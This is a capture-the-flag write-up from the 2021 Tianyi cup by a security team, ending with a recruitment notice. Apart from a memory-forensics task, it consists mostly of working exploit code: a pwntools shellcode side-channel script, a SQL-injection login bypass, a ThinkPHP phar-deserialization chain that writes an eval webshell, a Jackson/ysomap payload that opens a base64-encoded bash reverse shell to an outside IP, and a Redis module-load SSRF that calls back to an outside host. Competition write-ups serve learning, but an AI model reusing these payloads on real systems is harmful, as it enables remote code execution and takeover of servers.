2021 second Tianyi cup ctf

Misc

Sign in

Group announcement
FLAG
flag{e7gRR32wJJcHwQjwc2k9qFZ6fvn3gZ8P}

Browser

First get
1. Default browser (please provide the corresponding value in the registry that can prove that it is the default browser, such as IE.HTTP)
This is generally found in the registry; search through it patiently.

./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist -o 0x8f484880

http://www.360doc.com/content/14/0216/23/13813789_353089973.shtml

Note the address printed next to the registry hive.

Then search the Win7 registry for
"Software\Microsoft\windows\Shell\Associations\UrlAssociations\http\Userchoice"


./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 dumpfiles -Q 0x000000007da2abf0 -D ./


Download the dumped file and import it into Navicat

Sort in descending order, and then you can see
https://weibo.com/login.php
Concatenate them:
MSEdgeHTM_92.0.902.78_https://weibo.com/login.php
Get flag

Pwn

ezshell

from pwn import *
elf=ELF('./chall')
EXCV = context.binary = './chall'
context.arch='amd64'
def pwn(p, idx, c):
# open
shellcode = '''
push 0x3a; pop rdi; xor rbx,rbx;inc bl;shl rbx,0x10;add rdi,rbx; xor
esi, esi;
open:
push 2; pop rax; syscall;
cmp al,0x4
jl open
'''
# re open, rax => 0x14
# read(rax, 0x10050, 0x50)
shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x50;
pop rsi;add rsi,rbx; syscall;"
# cmp and jz
if idx == 0:
shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(idx,
c)
else:
shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(idx,
c)
shellcode = asm(shellcode)
p.recvuntil('======== Input your secret code ========\n')
p.send(shellcode.ljust(0x40-6, b'a') + b'./flag')
idx = 0
var_list = []
while(1):
for c in range(32, 127):
p = remote("47.104.169.149",25178)
# p=process('./chall')
pwn(p, idx, c)
start = time.time()
try:
p.recv(timeout=2)
except:
pass
end = time.time()
p.close()
if end-start > 1.5:
var_list.append(c)
print("".join([chr(i) for i in var_list]))
break
else:
print("".join([chr(i) for i in var_list]))
break
idx = idx + 1
print("".join([chr(i) for i in var_list]))

Web

eztp

www.zip source code disclosure

POST /public/ HTTP/1.1
Host: 8.134.37.86:26846
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0)
Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://8.134.37.86:26846
Connection: close
Referer: http://8.134.37.86:26846/public/index.php
Cookie: PHPSESSID=7la556p4v160a8j1nhcholth1d
username[0]=not like&username[1][0]=%%&username[1][1]=233&username[2]=)
union select 1,1#&password=1

Use the injection to log in to the admin backend
POP chain

<?php
namespace think {
abstract class Model
{
protected $append;
protected $error;
public $parent;
}
}
namespace think\model {
use think\db\Query;
use think\Model;
use think\model\relation\HasOne;
use think\console\Output;
abstract class Relation
{
protected $query;
protected $selfRelation;
protected $parent;
protected $foreignKey;
protected $localKey;
}
class Pivot extends Model
{
public function __construct()
{
$this->append = ['mb' => 'getError'];
$this->error = new HasOne();
$this->parent = new Output();
}
}
}
namespace think\session\driver {
use think\cache\driver\File;
class Memcached
{
protected $handler;
public function __construct()
{
$this->handler = new File();
}
}
}
namespace think\cache\driver {
class File
{
protected $options;
protected $tag;
function __construct()
{
$this->options = [
'expire' => 3600,
'cache_subdir' => false,
'prefix' => '',
'path' => 'php://filter/convert.iconv.utf-8.utf7|convert.base64-
decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../../../../../
../../../var/www/html/public/uploads/a.php',
'data_compress' => false,
];
$this->tag = 1;
}
}
}
namespace think\db {
use think\console\Output;
class Query
{
protected $model;
public function __construct()
{
$this->model = new Output();
}
}
}
namespace think\console {
use think\session\driver\Memcached;
class Output
{
protected $styles;
private $handle;
public function __construct()
{
$this->styles = ['where'];
$this->handle = new Memcached();
}
}
}
namespace think\model\relation {
use think\Model\Relation;
use think\db\Query;
use think\console\Output;
abstract class OneToOne extends Relation
{
protected $bindAttr;
}
class HasOne extends OneToOne
{
public function __construct()
{
$this->selfRelation = 0;
$this->query = new Output();
$this->bindAttr = ['ccc', 'ccc'];
$this->foreignKey = 'ccc';
$o = new \stdClass();
$o->mb = 'ccc';
$this->parent = $o;
$this->localKey = 'mb';
}
}
}
namespace think\process\pipes {
use think\model\Pivot;
class Windows
{
private $files;
public function __construct()
{
$this->files = [new Pivot()];
}
}
}
namespace {
use think\process\pipes\Windows;
// echo urlencode(base64_encode(serialize(new Windows())));
$phar = new Phar("exp.phar"); //Suffix must be phar
$phar->startBuffering();
$phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');
$object = new Windows();
$phar->setMetadata($object); //Save the customized meta data into the manifest
$phar->addFromString("1.php", ""); //Add files to compress
//Automatic signature calculation
$phar->stopBuffering();
rename("exp.phar", "exp.jpg");
}

Upload phar file
Trigger phar deserialization through the listpic route

http://8.134.37.86:24954/public/?
s=admin/index/listpic&dir=phar:///var/www/html/public/static/img/person.jpg

Read the flag after the webshell has been written

jackson

Peanut shell setting intranet penetration arrangement malicious ldap service

use exploit LDAPLocalChainListener
use payload CommonsCollections8
use bullet TransformerBullet
set lport 9001
set version 3
set args 'set args 'bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzIuMjAxLjQ0Lzk5OTkgMD4mMQ==}|{base64,-
d}|{bash,-i}''
run

ysomap directly uses the payload above
Transfer to the server and connect to the shell

easy_eval

Deserialization

<?php
class a{
public $code = "system('cat /*;id');";
function __construct($code)
{
$this->code = $code;
}
}
class b{
function __construct($code)
{
$this->a = new a($code);
}
function __destruct(){
echo $this->a->a();
}
}
$c = new b('eval($_REQUEST[0]);');
echo serialize($c);

Upload the so extension of redis to the / tmp directory
Start ssrf with fsockopen and call redis

<?php
function Getfile($host, $port, $link){
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if(!$fp){
echo "$errstr (error number $errno) \n";
}else{
$out = "$link";
//$out = "GET $link HTTP/1.1\r\n";
//$out .= "HOST $host \r\n";
//$out .= "Connection: Close\r\n\r\n";
//$out .= "\r\n";
fwrite($fp, $out);
$content = '';
while(!feof($fp)){
$contents .= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
$poc = "AUTH you_cannot_guess_it\r\n";
$poc .= "module load /tmp/exp.so\r\nsystem.rev 121.196.165.115 6663\r\n";
$poc .= "info\r\nquit\r\n";
var_dump($poc);
var_dump(Getfile("127.0.0.1","6379",$poc));


Tip

Do you want to join a security team
Have a better learning atmosphere?

Then join EDI security. The threshold here is not very high, but the masters are experienced and can take you from the foundation, as long as you have the determination to make persistent efforts.

The EDI Security CTF team often participates in major CTF competitions and understands them well. We are working hard to create a good technical atmosphere in the security community. This is definitely a good place for you to learn technology. The threshold here is not very high, but the masters are experienced and can start with you from the foundation. As long as you have the determination to make persistent efforts, the next CTF expert is you.

Newcomers are welcome. Let's play CTF together and make progress together.

We're digging. We won't let you bury it!

Your joining can bring us new vitality, and we can also give you unlimited development space.

If you are interested, please contact the email root@edisec.net (bring your resume, including your learning direction, learning experience, etc.)

